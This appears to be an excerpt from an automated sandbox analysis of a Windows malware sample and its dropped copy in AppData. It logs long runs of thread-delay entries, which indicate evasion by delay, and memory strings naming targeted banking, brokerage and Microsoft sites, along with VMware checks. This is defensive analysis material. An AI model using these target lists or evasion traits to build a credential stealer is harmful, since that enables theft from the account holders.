Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596872s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595819s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594416s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe TID: 8092	Thread sleep time: -594149s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7216	Thread sleep count: 1611 > 30
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7216	Thread sleep count: 8257 > 30
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598776s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597905s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597247s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597139s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596570s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596306s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -596093s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595984s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595875s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595765s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595546s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595437s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595218s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595109s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -595000s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -594890s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -594781s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -594671s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -594562s >= -30000s
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe TID: 7212	Thread sleep time: -594453s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596872	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595819	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594416	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Thread delayed: delay time: 594149	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598776
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597247
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597139
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596570
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596306
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 596093
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595765
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595546
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595218
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Thread delayed: delay time: 594453

Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: EUYIlr7uUX.exe, 00000007.00000002.3888995984.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAH6M
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: qggKEJlcsFa.exe, 00000008.00000002.1471226706.0000000000F24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcea80a4ac6638<
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003DC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: qggKEJlcsFa.exe, 0000000C.00000002.3898797731.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
